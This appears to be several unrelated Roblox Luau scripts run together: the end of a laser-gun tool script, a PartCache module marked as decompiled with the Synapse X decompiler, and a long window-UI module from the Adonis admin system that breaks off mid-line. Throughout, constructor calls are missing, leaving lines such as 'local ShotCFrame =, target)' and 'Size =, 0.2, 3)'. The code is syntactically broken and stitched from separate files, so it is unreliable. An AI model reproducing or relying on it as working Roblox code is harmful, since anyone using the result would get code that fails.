end if Projectile and Projectile.Parent then Projectile:Destroy() end end end function Equipped() Character = Tool.Parent Player = Players:GetPlayerFromCharacter(Character) Humanoid = Character:FindFirstChild("Humanoid") if not Player or not Humanoid or Humanoid.Health == 0 then return end end function Activated(target) if Tool.Enabled and Humanoid.Health > 0 then Tool.Enabled = false InvokeClient("PlaySound", Sounds.Fire) local HandleCFrame = Handle.CFrame local FiringPoint = HandleCFrame.p + HandleCFrame:vectorToWorldSpace(NozzleOffset) local ShotCFrame =, target) local LaserShotClone = BaseShot:Clone() LaserShotClone.CFrame = ShotCFrame + (ShotCFrame.lookVector * (BaseShot.Size.Z / 2)) local BodyVelocity ="BodyVelocity") BodyVelocity.velocity = ShotCFrame.lookVector * Speed BodyVelocity.Parent = LaserShotClone LaserShotClone.Touched:connect(function(Hit) if not Hit or not Hit.Parent then return end Touched(LaserShotClone, Hit) end) Debris:AddItem(LaserShotClone, Duration) LaserShotClone.Parent = game:GetService("Workspace") wait(0) -- FireSound length InvokeClient("PlaySound", Sounds.Reload) wait(0) -- ReloadSound length Tool.Enabled = true end end function Unequipped() end BaseShot ="Part") BaseShot.Name = "Effect" BaseShot.BrickColor ="Toothpaste") BaseShot.Material = Enum.Material.Plastic BaseShot.Shape = Enum.PartType.Block BaseShot.TopSurface = Enum.SurfaceType.Smooth BaseShot.BottomSurface = Enum.SurfaceType.Smooth BaseShot.FormFactor = Enum.FormFactor.Custom BaseShot.Size =, 0.2, 3) BaseShot.CanCollide = false BaseShot.Locked = true SelectionBoxify(BaseShot) Light(BaseShot) BaseShotSound = Sounds.HitFade:Clone() BaseShotSound.Parent = BaseShot Tool.Equipped:connect(Equipped) Tool.Unequipped:connect(Unequipped)
-- Decompiled with the Synapse X Luau decompiler.
local v1 = {}; v1.__index = v1; v1.__type = "PartCache"; local u1 =, 1000000000, 0); local u2 = require(script:WaitForChild("Table")); function, p2, p3) assert(p2 > 0, "PrecreatedParts can not be negative!"); if p2 ~= 0 == false then warn("PrecreatedParts is 0! This may have adverse effects when initially using the cache."); end; if p1.Archivable == false then warn("The template's Archivable property has been set to false, which prevents it from being cloned. It will temporarily be set to true."); end; p1.Archivable = true; p1.Archivable = p1.Archivable; p1 = p1:Clone(); local v2 = { Open = {}, InUse = {}, CurrentCacheParent = p3 or workspace, Template = p1, ExpansionSize = 10 }; setmetatable(v2, v1); for v3 = 1, p2 and 5 do local v4 = p1:Clone(); v4.CFrame = u1; v4.Anchored = true; v4.Parent = v2.CurrentCacheParent; u2.insert(v2.Open, v4); end; v2.Template.Parent = nil; return v2; end; function v1.GetPart(p4) assert(getmetatable(p4) == v1, ("Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s"):format("GetPart", "")); if #p4.Open == 0 then for v5 = 1, p4.ExpansionSize do local v6 = p4.Template:Clone(); v6.CFrame = u1; v6.Anchored = true; v6.Parent = p4.CurrentCacheParent; u2.insert(p4.Open, v6); end; end; local v7 = p4.Open[#p4.Open]; p4.Open[#p4.Open] = nil; u2.insert(p4.InUse, v7); return v7; end; function v1.ReturnPart(p5, p6) assert(getmetatable(p5) == v1, ("Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s"):format("ReturnPart", "")); local v8 = u2.indexOf(p5.InUse, p6); if v8 == nil then return; end; u2.remove(p5.InUse, v8); u2.insert(p5.Open, p6); p6.CFrame = u1; p6.Anchored = true; end; function v1.SetCacheParent(p7, p8) assert(getmetatable(p7) == v1, ("Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s"):format("SetCacheParent", "")); assert(p8:IsDescendantOf(workspace) or p8 == workspace, "Cache parent is not a descendant of Workspace! Parts should be kept where they will remain in the visible world."); p7.CurrentCacheParent = p8; for v9 = 1, #p7.Open do p7.Open[v9].Parent = p8; end; for v10 = 1, #p7.InUse do p7.InUse[v10].Parent = p8; end; end; function v1.Expand(p9, p10) assert(getmetatable(p9) == v1, ("Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s"):format("Expand", "")); if p10 == nil then p10 = p9.ExpansionSize; end; for v11 = 1, p10 do local v12 = p9.Template:Clone(); v12.CFrame = u1; v12.Anchored = true; v12.Parent = p9.CurrentCacheParent; u2.insert(p9.Open, v12); end; end; function v1.Dispose(p11) assert(getmetatable(p11) == v1, ("Cannot statically invoke method '%s' - It is an instance method. Call it on an instance of this class created via %s"):format("Dispose", "")); for v13 = 1, #p11.Open do p11.Open[v13]:Destroy(); end; for v14 = 1, #p11.InUse do p11.InUse[v14]:Destroy(); end; p11.Template:Destroy(); p11.Open = {}; p11.InUse = {}; p11.CurrentCacheParent = nil; p11.GetPart = nil; p11.ReturnPart = nil; p11.SetCacheParent = nil; p11.Expand = nil; p11.Dispose = nil; end; return v1;
--Put this inside of 'ServerScriptService'. --Workspace works as well, but I'd recommend the above.
--// All global vars will be wiped/replaced except script
return function(data, env) if env then setfenv(1, env) end --local client = service.GarbleTable(client) local Player = service.Players.LocalPlayer local Mouse = Player:GetMouse() local InputService = service.UserInputService local gIndex = data.gIndex local gTable = data.gTable local Event = gTable.BindEvent local GUI = gTable.Object local Name = data.Name local Icon = data.Icon local Size = data.Size local Menu = data.Menu local Title = data.Title local Ready = data.Ready local Walls = data.Walls local noHide = data.NoHide local noClose = data.NoClose local onReady = data.OnReady local onClose = data.OnClose local onResize = data.OnResize local onRefresh = data.OnRefresh local onMinimize = data.OnMinimize local ContextMenu = data.ContextMenu local ResetOnSpawn = data.ResetOnSpawn local CanKeepAlive = data.CanKeepAlive local iconClicked = data.IconClicked local SizeLocked = data.SizeLocked or data.SizeLock local CanvasSize = data.CanvasSize local Position = data.Position local Content = data.Content or data.Children local MinSize = data.MinSize or {150, 50} local MaxSize = data.MaxSize or {math.huge, math.huge} local curIcon = Mouse.Icon local isClosed = false local Resizing = false local Refreshing = false local DragEnabled = true local checkProperty = service.CheckProperty local specialInsts = {} local inExpandable local addTitleButton local LoadChildren local BringToFront local functionify local Drag = GUI.Drag local Close = Drag.Close local Hide = Drag.Hide local Iconf = Drag.Icon local Titlef = Drag.Title local Refresh = Drag.Refresh local rSpinner = Refresh.Spinner local Main = Drag.Main local Tooltip = GUI.Desc local ScrollFrame = GUI.Drag.Main.ScrollingFrame local LeftSizeIcon = Main.LeftResizeIcon local RightSizeIcon = Main.RightResizeIcon local RightCorner = Main.RightCorner local LeftCorner = Main.LeftCorner local RightSide = Main.RightSide local LeftSide = Main.LeftSide local TopRight = Main.TopRight local TopLeft = Main.TopLeft local Bottom = Main.Bottom local Top = Main.Top function Expand(ent, point, text) local label = point:FindFirstChild("Label") if label then ent.MouseLeave:Connect(function(x,y) if inExpandable == ent then point.Visible = false end end) ent.MouseMoved:Connect(function(x,y) inExpandable = ent label.Text = text or ent.Desc.Value --point.Size =, 10000, 0, 10000) local newx = 500 local bounds = service.TextService:GetTextSize(text or ent.Desc.Value, label.TextSize, label.Font,,1000)).X-- point.Label.TextBounds.X local rows = math.floor(bounds/500) rows = rows+1 if rows<1 then rows = 1 end if bounds<500 then newx = bounds end point.Size =, newx+10, 0, (rows*20)+10) point.Position =, x+6, 0, y-40-((rows*20)+10)) point.Visible = true end) end end function getNextPos(frame) local farXChild, farYChild for i,v in next,frame:GetChildren() do if checkProperty(v, "Size") then if not farXChild or (v.AbsolutePosition.X + v.AbsoluteSize.X) > (farXChild.AbsolutePosition.X + farXChild.AbsoluteSize.X) then farXChild = v end if not farYChild or (v.AbsolutePosition.Y + v.AbsoluteSize.Y) > (farXChild.AbsolutePosition.Y + farXChild.AbsoluteSize.Y) then farYChild = v end end end return ((not farXChild or not farYChild) and,0,0,0)) or, farXChild.Position.X.Offset + farXChild.AbsoluteSize.X, farYChild.Position.Y.Scale, farYChild.Position.Y.Offset + farYChild.AbsoluteSize.Y) end function LoadChildren(Obj, Children) if Children then local runWhenDone = Children.RunWhenDone and functionify(Children.RunWhenDone, Obj) for class,data in next,Children do if type(data) == "table" then if not data.Parent then data.Parent = Obj end create(data.Class or data.ClassName or class, data) elseif type(data) == "function" or type(data) == "string" and not runWhenDone then runWhenDone = functionify(data, Obj) end end if runWhenDone then runWhenDone(Obj) end end end function BringToFront() for i,v in ipairs(Player.PlayerGui:GetChildren()) do if v:FindFirstChild("__ADONIS_WINDOW") then v.DisplayOrder = 100 end end GUI.DisplayOrder = 101 end function addTitleButton(data) local startPos = 1 local realPos local new local original = Hide if Hide.Visible then startPos = startPos+1 end if Close.Visible then startPos = startPos+1 end if Refresh.Visible then startPos = startPos+1 end realPos =, -(((30*startPos)+5)+(startPos-1)), 0, 0) data.Position = data.Position or realPos data.Size = data.Size or original.Size data.BackgroundColor3 = data.BackgroundColor3 or original.BackgroundColor3 data.BackgroundTransparency = data.BackgroundTransparency or original.BackgroundTransparency data.BorderSizePixel = data.BorderSizePixel or original.BorderSizePixel data.ZIndex = data.ZIndex or original.ZIndex data.TextColor3 = data.TextColor3 or original.TextColor3 data.TextScaled = data.TextScaled or original.TextScaled data.TextStrokeColor3 = data.TextStrokeColor3 or original.TextStrokeColor3 data.TextSize = data.TextSize or original.TextSize data.TextTransparency = data.TextTransparency or original.TextTransparency data.TextStrokeTransparency = data.TextStrokeTransparency or original.TextStrokeTransparency data.TextScaled = data.TextScaled or original.TextScaled data.TextWrapped = data.TextWrapped or original.TextWrapped --data.TextXAlignment = data.TextXAlignment or original.TextXAlignment --data.TextYAlignment = data.TextYAlignment or original.TextYAlignment data.Font = data.Font or original.Font data.Parent = Drag return create("TextButton", data) end function functionify(func, object) if type(func) == "string" then if object then local env = GetEnv() env.Object = object return client.Core.LoadCode(func, env) else return client.Core.LoadCode(func) end else return func end end function create(class, dataFound, existing) local data = dataFound or {} local class = data.Class or data.ClassName or class local new = existing or (specialInsts[class] and specialInsts[class]:Clone()) or service.New(class) local parent = data.Parent or new.Parent if dataFound then data.Parent = nil if data.Class or data.ClassName then data.Class = nil data.ClassName = nil end if not data.BorderColor3 and checkProperty(new,"BorderColor3") then new.BorderColor3 = dBorder end if not data.CanvasSize and checkProperty(new,"CanvasSize") then new.CanvasSize = dCanvasSize end if not data.BorderSizePixel and checkProperty(new,"BorderSizePixel") then new.BorderSizePixel = dPixelSize end if not data.BackgroundColor3 and checkProperty(new,"BackgroundColor3") then new.BackgroundColor3 = dBackground end if not data.PlaceholderColor3 and checkProperty(new,"PlaceholderColor3") then new.PlaceholderColor3 = dPlaceholderColor end if not data.Transparency and not data.BackgroundTransparency and checkProperty(new,"Transparency") then new.BackgroundTransparency = dTransparency elseif data.Transparency then new.BackgroundTransparency = data.Transparency end if not data.TextColor3 and not data.TextColor and checkProperty(new,"TextColor3") then new.TextColor3 = dTextColor elseif data.TextColor then new.TextColor3 = data.TextColor end if not data.Font and checkProperty(new, "Font") then data.Font = dFont end if not data.TextSize and checkProperty(new, "TextSize") then data.TextSize = dTextSize end if not data.BottomImage and not data.MidImage and not data.TopImage and class == "ScrollingFrame" then new.BottomImage = dScrollImage new.MidImage = dScrollImage new.TopImage = dScrollImage end if not data.Size and checkProperty(new,"Size") then new.Size = dSize end if not data.Position and checkProperty(new,"Position") then new.Position = dPosition end if not data.ZIndex and checkProperty(new,"ZIndex") then new.ZIndex = dZIndex if parent and checkProperty(parent, "ZIndex") then new.ZIndex = parent.ZIndex end end if data.TextChanged and class == "TextBox" then local textChanged = functionify(data.TextChanged, new) new.FocusLost:Connect(function(enterPressed) textChanged(new.Text, enterPressed, new) end) end if (data.OnClicked or data.OnClick) and (class == "TextButton" or class == "ImageButton") then local debounce = false; local doDebounce = data.Debounce; local onClick = functionify((data.OnClicked or data.OnClick), new) new.MouseButton1Down:Connect(function() if not debounce then if doDebounce then debounce = true end onClick(new); debounce = false; end end) end if data.Events then for event,func in pairs(data.Events) do local realFunc = functionify(func, new) Event(new[event], function(...) realFunc(...) end) end end if data.Visible == nil then data.Visible = true end if data.LabelProps then data.LabelProperties = data.LabelProps end end if class == "Entry" then local label = new.Text local dots = new.Dots local desc = new.Desc label.ZIndex = data.ZIndex or new.ZIndex dots.ZIndex = data.ZIndex or new.ZIndex if data.Text then new.Text.Text = data.Text new.Text.Visible = true data.Text = nil end if data.Desc or data.ToolTip then new.Desc.Value = data.Desc or data.ToolTip data.Desc = nil end Expand(new, Tooltip) else if data.ToolTip then Expand(new, Tooltip, data.ToolTip) end end if class == "ButtonEntry" then local button = new.Button local debounce = false local onClicked = functionify(data.OnClicked, button) new:SetSpecial("DoClick",function() if not debounce then debounce = true if onClicked then onClicked(button) end debounce = false end end) new.Text = data.Text or new.Text button.ZIndex = data.ZIndex or new.ZIndex button.MouseButton1Down:Connect(new.DoClick) end if class == "Boolean" then local enabled = data.Enabled local debounce = false local onToggle = functionify(data.OnToggle, new) local function toggle(isEnabled) if not debounce then debounce = true if (isEnabled ~= nil and isEnabled) or (isEnabled == nil and enabled) then enabled = false new.Text = "Disabled" elseif (isEnabled ~= nil and isEnabled == false) or (isEnabled == nil and not enabled) then enabled = true new.Text = "Enabled" end if onToggle then onToggle(enabled, new) end debounce = false end end --new.ZIndex = data.ZIndex new.Text = (enabled and "Enabled") or "Disabled" new.MouseButton1Down:Connect(function() if onToggle then toggle() end end) new:SetSpecial("Toggle",function(ignore, isEnabled) toggle(isEnabled) end) end if class == "StringEntry" then local box = new.Box local ignore new.Text = data.Text or new.Text box.ZIndex = data.ZIndex or new.ZIndex if data.BoxText then box.Text = data.BoxText end if data.BoxProperties then for i,v in next,data.BoxProperties do if checkProperty(box, i) then box[i] = v end end end if data.TextChanged then local textChanged = functionify(data.TextChanged, box) box.Changed:Connect(function(p) if p == "Text" and not ignore then textChanged(box.Text) end end) box.FocusLost:Connect(function(enter) local change = textChanged(box.Text, true, enter) if change then ignore = true box.Text = change ignore = false end end) end new:SetSpecial("SetValue",function(ignore, newValue) box.Text = newValue end) end if class == "Slider" then local mouseIsIn = false local posValue = new.Percentage local slider = new.Slider local bar = new.SliderBar local drag = new.Drag local moving = false local value = 0 local onSlide = functionify(data.OnSlide, new) bar.ZIndex = data.ZIndex or new.ZIndex slider.ZIndex = bar.ZIndex+1 drag.ZIndex = slider.ZIndex+1 drag.Active = true if data.Value then slider.Position =, -10, 0.5, -10) drag.Position = slider.Position end bar.InputBegan:Connect(function(input) if not moving and input.UserInputType == Enum.UserInputType.MouseButton1 then value = ((Mouse.X)-(new.AbsolutePosition.X))/(new.AbsoluteSize.X) if value < 0 then value = 0 elseif value > 1 then value = 1 end slider.Position =, -10, 0.5, -10) drag.Position = slider.Position posValue.Value = value if onSlide then onSlide(value) end end end) drag.DragBegin:Connect(function() moving = true end) drag.DragStopped:Connect(function() moving = false drag.Position = slider.Position end) drag.Changed:Connect(function() if moving then value = ((Mouse.X)-(new.AbsolutePosition.X))/(new.AbsoluteSize.X) if value < 0 then value = 0 elseif value > 1 then value = 1 end slider.Position =, -10, 0.5, -10) posValue.Value = value if onSlide then onSlide(value) end end end) new:SetSpecial("SetValue",function(ignore, newValue) if newValue and tonumber(newValue) then value = tonumber(newValue) posValue.Value = value slider.Position =, -10, 0.5, -10) drag.Position = slider.Position end end) end if class == "Dropdown" then local menu = new.Menu local downImg = new.Down local selected = new.dSelected local options = data.Options local curSelected = data.Selected or data.Selection local onSelect = functionify(data.OnSelection or data.OnSelect or function()end) local textProps = data.TextProperties local scroller = create("ScrollingFrame", { Parent = menu; Size =, 0, 1, 0); Position =, 0, 0, 0); BackgroundTransparency = 1; ZIndex = 100; }) menu.ZIndex = scroller.ZIndex menu.Parent = GUI menu.Visible = false menu.Size =, new.AbsoluteSize.X, 0, 100); menu.BackgroundColor3 = data.BackgroundColor3 or new.BackgroundColor3 if data.TextAlignment then selected.TextXAlignment = data.TextAlignment selected.Position =, 30, 0, 0); end if data.NoArrow then downImg.Visible = false end new:SetSpecial("MenuContainer", menu) new.Changed:Connect(function(p) if p == "AbsolutePosition" and menu.Visible then menu.Position =, new.AbsolutePosition.X, 0, new.AbsolutePosition.Y+new.AbsoluteSize.Y) elseif p == "AbsoluteSize" or p == "Parent" then downImg.Size =, new.AbsoluteSize.Y, 1, 0); if data.TextAlignment == "Right" then downImg.Position =, 0, 0.5, -(downImg.AbsoluteSize.X/2)) selected.Position =, new.AbsoluteSize.Y, 0, 0); else downImg.Position =, -downImg.AbsoluteSize.X, 0.5, -(downImg.AbsoluteSize.X/2)) end selected.Size =, -downImg.AbsoluteSize.X, 1, 0); if options and #options <= 6 then menu.Size =, new.AbsoluteSize.X, 0, 30*#options); else menu.Size =, new.AbsoluteSize.X, 0, 30*6); scroller:ResizeCanvas(false, true); end end end) selected.ZIndex = new.ZIndex downImg.ZIndex = new.ZIndex if textProps then for i,v in next,textProps do selected[i] = v end end if options then for i,v in next,options do local button = scroller:Add("TextButton", { Text = " ".. tostring(v); Size =, -10, 0, 30); Position =, 5, 0, 30*(i-1)); ZIndex = menu.ZIndex; BackgroundTransparency = 1; OnClick = function() selected.Text = v; onSelect(v, new); menu.Visible = false end }) if textProps then for i,v in next,textProps do button[i] = v end end end if curSelected then selected.Text = curSelected else selected.Text = "No Selection" end selected.MouseButton1Down:Connect(function() menu.Position =, new.AbsolutePosition.X, 0, new.AbsolutePosition.Y+new.AbsoluteSize.Y) menu.Visible = not menu.Visible end) end end if class == "TabFrame" then local buttons = create("ScrollingFrame", nil, new.Buttons) local frames = new.Frames local numTabs = 0 local buttonSize = data.ButtonSize or 60 new.BackgroundTransparency = data.BackgroundTransparency or 1 buttons.ZIndex = data.ZIndex or new.ZIndex frames.ZIndex = buttons.ZIndex new:SetSpecial("GetTab", function(ignore, name) return frames:FindFirstChild(name) end) new:SetSpecial("NewTab", function(ignore, name, data) local data = data or {} --local numChildren = #frames:GetChildren() local nextPos = getNextPos(buttons); local textSize = service.TextService:GetTextSize(data.Text or name, dTextSize, dFont, buttons.AbsoluteSize) local oTextTrans = data.TextTransparency local isOpen = false local disabled = false local tabFrame = create("ScrollingFrame",{ Name = name; Size =, 0, 1, 0); Position =, 0, 0, 0); BorderSizePixel = 0; BackgroundTransparency = data.FrameTransparency or data.Transparency; BackgroundColor3 = data.Color or dBackground:lerp(,1,1), 0.2); ZIndex = buttons.ZIndex; Visible = false; }) local tabButton = create("TextButton",{ Name = name; Text = data.Text or name; Size =, textSize.X+20, 1, 0); ZIndex = buttons.ZIndex; Position =, (nextPos.X.Offset > 0 and nextPos.X.Offset+5) or 0, 0, 0); TextColor3 = data.TextColor; BackgroundTransparency = 0.7; TextTransparency = data.TextTransparency; BackgroundColor3 = data.Color or dBackground:lerp(,1,1), 0.2); BorderSizePixel = 0; }) tabFrame:SetSpecial("FocusTab",function() for i,v in next,buttons:GetChildren() do if isGui(v) then v.BackgroundTransparency = 0.7 v.TextTransparency = 0.7 end end for i,v in next,frames:GetChildren() do if isGui(v) then v.Visible = false end end tabButton.BackgroundTransparency = data.Transparency or 0 tabButton.TextTransparency = data.TextTransparency or 0 tabFrame.Visible = true if data.OnFocus then data.OnFocus(true) end end) if numTabs == 0 then tabFrame.Visible = true tabButton.BackgroundTransparency = data.Transparency or 0 end tabButton.MouseButton1Down:Connect(function() if not disabled then tabFrame:FocusTab() end end) tabButton.Parent = buttons tabFrame.Parent = frames buttons:ResizeCanvas(true, false) tabFrame:SetSpecial("Disable", function() disabled = true; tabButton.BackgroundTransparency = 0.9; tabButton.TextTransparency = 0.9 end) tabFrame:SetSpecial("Enable", function() disabled = false; tabButton.BackgroundTransparency = 0.7; tabButton.TextTransparency = data.TextTransparency or 0; end) numTabs = numTabs+1; return tabFrame,tabButton end) end if class == "ScrollingFrame" then local genning = false if not data.ScrollBarThickness then data.ScrollBarThickness = dScrollBar end new:SetSpecial("GenerateList", function(obj, list, labelProperties, bottom) local list = list or obj; local genHold = {} local entProps = labelProperties or {} genning = genHold new:ClearAllChildren() local num = 0 for i,v in next,list do local text = v; local desc; local color local richText; if type(v) == "table" then text = v.Text desc = v.Desc color = v.Color if v.RichTextAllowed or entProps.RichTextAllowed then richText = true end end local label = create("TextLabel",{ Text = " "..tostring(text); ToolTip = desc; Size =,-5,0,(entProps.ySize or 20)); Visible = true; BackgroundTransparency = 1; Font = "Arial"; TextSize = 14; TextStrokeTransparency = 0.8; TextXAlignment = "Left"; Position =,0,0,num*(entProps.ySize or 20)); RichText = richText or false; }) if color then label.TextColor3 = color end if labelProperties then for i,v in next,entProps do if checkProperty(label, i) then label[i] = v end end end if genning == genHold then label.Parent = new; else label:Destroy() break end num = num+1 if data.Delay then if type(data.Delay) == "number" then wait(data.Delay) elseif i%100 == 0 then wait(0.1) end end end new:ResizeCanvas(false, true, false, bottom, 5, 5, 50) genning = nil end) new:SetSpecial("ResizeCanvas", function(ignore, onX, onY, xMax, yMax, xPadding, yPadding, modBreak) local xPadding,yPadding = data.xPadding or 5, data.yPadding or 5 local newY, newX = 0,0 if not onX and not onY then onX = false onY = true end for i,v in next,new:GetChildren() do if v:IsA("GuiObject") then if onY then v.Size =, v.Size.X.Offset, 0, v.AbsoluteSize.Y) v.Position =, v.Position.X.Offset, 0, v.AbsolutePosition.Y-new.AbsolutePosition.Y) end if onX then v.Size =, v.AbsoluteSize.X, v.Size.Y.Scale, v.Size.Y.Offset) v.Position =, v.AbsolutePosition.X-new.AbsolutePosition.X, v.Position.Y.Scale, v.Position.Y.Offset) end local yLower = v.Position.Y.Offset + v.Size.Y.Offset local xLower = v.Position.X.Offset + v.Size.X.Offset newY = math.max(newY, yLower) newX = math.max(newX, xLower) if modBreak then if i%modBreak == 0 then wait(1/60) end end end end if onY then new.CanvasSize =, new.CanvasSize.X.Offset, 0, newY+yPadding) end if onX then new.CanvasSize =, newX + xPadding, new.CanvasSize.Y.Scale, new.CanvasSize.Y.Offset) end if xMax then new.CanvasPosition = + xPadding)-new.AbsoluteSize.X, new.CanvasPosition.Y) end if yMax then new.CanvasPosition =, (newY+yPadding)-new.AbsoluteSize.Y) end end) if data.List then new:GenerateList(data.List) data.List = nil end end LoadChildren(new, data.Content or data.Children) data.Children = nil data.Content = nil for i,v in next,data do if checkProperty(new, i) then new[i] = v end end new.Parent = parent return apiIfy(new, data, class),data end function apiIfy(gui, data, class) local newGui = service.Wrap(gui) gui:SetSpecial("Object", gui) gui:SetSpecial("SetPosition", function(ignore, newPos) gui.Position = newPos end) gui:SetSpecial("SetSize", function(ingore, newSize) gui.Size = newSize end) gui:SetSpecial("Add", function(ignore, class, data) if not data then data = class class = ignore end local new = create(class,data); new.Parent = gui; return apiIfy(new, data, class) end) gui:SetSpecial("Copy", function(ignore, class, gotData) local newData = {} local new for i,v in next,data do newData[i] = v end for i,v in next,gotData do newData[i] = v end new = create(class or data.Class or gui.ClassName, newData); new.Parent = gotData.Parent or gui.Parent; return apiIfy(new, data, class) end) return newGui end function doClose() if not isClosed then isClosed = true print(onClose) if onClose then onClose() end gTable:Destroy() end end function isVisible() return Main.Visible end local hideLabel = Hide:FindFirstChild("TextLabel") function doHide(doHide) local origLH = Hide.LineHeight if doHide or (doHide == nil and Main.Visible) then dragSize = Drag.Size Main.Visible = false Drag.BackgroundTransparency = Main.BackgroundTransparency Drag.BackgroundColor3 = Main.BackgroundColor3 Drag.Size =, 200, Drag.Size.Y.Scale, Drag.Size.Y.Offset) if hideLabel then hideLabel.Text = "+" else Hide.Text = "+" end Hide.LineHeight = origLH gTable.Minimized = true elseif doHide == false or (doHide == nil and not Main.Visible) then Main.Visible = true Drag.BackgroundTransparency = 1 Drag.Size = dragSize or Drag.Size if hideLabel then hideLabel.Text = "-" else Hide.Text = "-" end Hide.LineHeight = origLH gTable.Minimized = false end if onMinimize then onMinimize(Main.Visible) end if Walls then wallPosition() end end function isInFrame(x, y, frame) if x > frame.AbsolutePosition.X and x < (frame.AbsolutePosition.X+frame.AbsoluteSize.X) and y > frame.AbsolutePosition.Y and y < (frame.AbsolutePosition.Y+frame.AbsoluteSize.Y) then return true else return false end end function wallPosition() if gTable.Active then local x,y = Drag.AbsolutePosition.X, Drag.AbsolutePosition.Y local abx, gx, gy = Drag.AbsoluteSize.X, GUI.AbsoluteSize.X, GUI.AbsoluteSize.Y local ySize = (Main.Visible and Main.AbsoluteSize.Y) or Drag.AbsoluteSize.Y if x < 0 then Drag.Position =, 0, Drag.Position.Y.Scale, Drag.Position.Y.Offset) end if y < 0 then Drag.Position =, Drag.Position.X.Offset, 0, 0) end if x + abx > gx then Drag.Position =, GUI.AbsoluteSize.X - Drag.AbsoluteSize.X, Drag.Position.Y.Scale, Drag.Position.Y.Offset) end if y + ySize > gy then Drag.Position =, Drag.Position.X.Offset, 0, GUI.AbsoluteSize.Y - ySize) end end end function setSize(newSize) if newSize and type(newSize) == "table" then if newSize[1] < 50 then newSize[1] = 50 end if newSize[2] < 50 then newSize[2] = 50 end Drag.Size =,newSize[1],Drag.Size.Y.Scale,Drag.Size.Y.Offset) Main.Size =,0,0,newSize[2]) end end function setPosition(newPos) if newPos and typeof(newPos) == "UDim2" then Drag.Position = newPos elseif newPos and type(newPos) == "table" then Drag.Position =, newPos[1], 0, newPos[2]) elseif Size and not newPos then Drag.Position =, -Drag.AbsoluteSize.X/2, 0.5, -Main.AbsoluteSize.Y/2) end end if Name then gTable.Name = Name if data.AllowMultiple ~= nil and data.AllowMultiple == false then local found, num = client.UI.Get(Name, GUI, true) if found then doClose() return nil end end end if Size then setSize(Size) end if Position then setPosition(Position) end if Title then Titlef.Text = Title end if CanKeepAlive or not ResetOnSpawn then gTable.CanKeepAlive = true GUI.ResetOnSpawn = false elseif ResetOnSpawn then gTable.CanKeepAlive = false GUI.ResetOnSpawn = true end if Icon then Iconf.Visible = true Iconf.Image = Icon end if CanvasSize then ScrollFrame.CanvasSize = CanvasSize end if noClose then Close.Visible = false Refresh.Position = Hide.Position Hide.Position = Close.Position end if noHide then Hide.Visible = false Refresh.Position = Hide.Position end if Walls then Drag.DragStopped:Connect(function() wallPosition() end) end if onRefresh then local debounce = false function DoRefresh() if not Refreshing then local done = false Refreshing = true spawn(function() while gTable.Active and not done do for i = 0,180,10 do rSpinner.Rotation = -i wait(1/60) end end end) onRefresh() wait(1) done = true Refreshing = false end end Refresh.MouseButton1Down:Connect(function() if not debounce then debounce = true DoRefresh() debounce = false end end) Titlef.Size =, -130, Titlef.Size.Y.Scale, Titlef.Size.Y.Offset) else Refresh.Visible = false end if iconClicked then Iconf.MouseButton1Down(function() iconClicked(data, GUI, Iconf) end) end if Menu then data.Menu.Text = "" data.Menu.Parent = Main data.Menu.Size =,-10,0,25) data.Menu.Position =,5,0,25) ScrollFrame.Size =,-10,1,-55) ScrollFrame.Position =,5,0,50) data.Menu.BackgroundColor3 = Color3.fromRGB(216, 216, 216) data.Menu.BorderSizePixel = 0 create("TextLabel",data.Menu) end if not SizeLocked then local startXPos = Drag.AbsolutePosition.X local startYPos = Drag.AbsolutePosition.Y local startXSize = Drag.AbsoluteSize.X local startYSize = Drag.AbsoluteSize.Y local vars = client.Variables local newIcon local inFrame local ReallyInFrame local function readify(obj) obj.MouseEnter:Connect(function() ReallyInFrame = obj end) obj.MouseLeave:Connect(function() if ReallyInFrame == obj then ReallyInFrame = nil end end) end --[[ readify(Drag) readify(ScrollFrame) readify(TopRight) readify(TopLeft) readify(RightCorner) readify(LeftCorner) readify(RightSide) readify(LeftSide) readify(Bottom) readify(Top) --]] function checkMouse(x, y) --// Update later to remove frame by frame pos checking if gTable.Active and Main.Visible then if isInFrame(x, y, Drag) or isInFrame(x, y, ScrollFrame) then inFrame = nil newIcon = nil elseif isInFrame(x, y, TopRight) then inFrame = "TopRight" newIcon = MouseIcons.TopRight elseif isInFrame(x, y, TopLeft) then inFrame = "TopLeft" newIcon = MouseIcons.TopLeft elseif isInFrame(x, y, RightCorner) then inFrame = "RightCorner" newIcon = MouseIcons.RightCorner elseif isInFrame(x, y, LeftCorner) then inFrame = "LeftCorner" newIcon = MouseIcons.LeftCorner elseif isInFrame(x, y, RightSide) then inFrame = "RightSide" newIcon = MouseIcons.Horizontal elseif isInFrame(x, y, LeftSide) then inFrame = "LeftSide" newIcon = MouseIcons.Horizontal elseif isInFrame(x, y, Bottom) then inFrame = "Bottom" newIcon = MouseIcons.Vertical elseif isInFrame(x, y, Top) then inFrame = "Top" newIcon = MouseIcons.Vertical else inFrame = nil newIcon = nil end else inFrame = nil end if (not client.Variables.MouseLockedBy) or client.Variables.MouseLockedBy == gTable then if inFrame and newIcon then Mouse.Icon = newIcon client.Variables.MouseLockedBy = gTable elseif client.Variables.MouseLockedBy == gTable then Mouse.Icon = curIcon client.Variables.MouseLockedBy = nil end end end local function inputStart(x, y) checkMouse(x, y) if gTable.Active and inFrame and not Resizing and not isInFrame(x, y, ScrollFrame) and not isInFrame(x, y, Drag) then Resizing = inFrame startXPos = Drag.AbsolutePosition.X startYPos = Drag.AbsolutePosition.Y startXSize = Drag.AbsoluteSize.X startYSize = Main.AbsoluteSize.Y end end local function inputEnd() if gTable.Active then if Resizing and onResize then onResize(, Drag.Size.X.Offset, Main.Size.Y.Scale, Main.Size.Y.Offset)) end Resizing = nil Mouse.Icon = curIcon --DragEnabled = true --if Walls then -- wallPosition() --end end end local function inputMoved(x, y) if gTable.Active then if Mouse.Icon ~= MouseIcons.TopRight and Mouse.Icon ~= MouseIcons.TopLeft and Mouse.Icon ~= MouseIcons.RightCorner and Mouse.Icon ~= MouseIcons.LeftCorner and Mouse.Icon ~= MouseIcons.Horizontal and Mouse.Icon ~= MouseIcons.Vertical then curIcon = Mouse.Icon end if Resizing then local moveX = false local moveY = false local newPos = Drag.Position local xPos, yPos = x, y local newX, newY = startXSize, startYSize --DragEnabled = false if Resizing == "TopRight" then newX = (xPos - startXPos) + 3 newY = (startYPos - yPos) + startYSize -1 moveY = true elseif Resizing == "TopLeft" then newX = (startXPos - 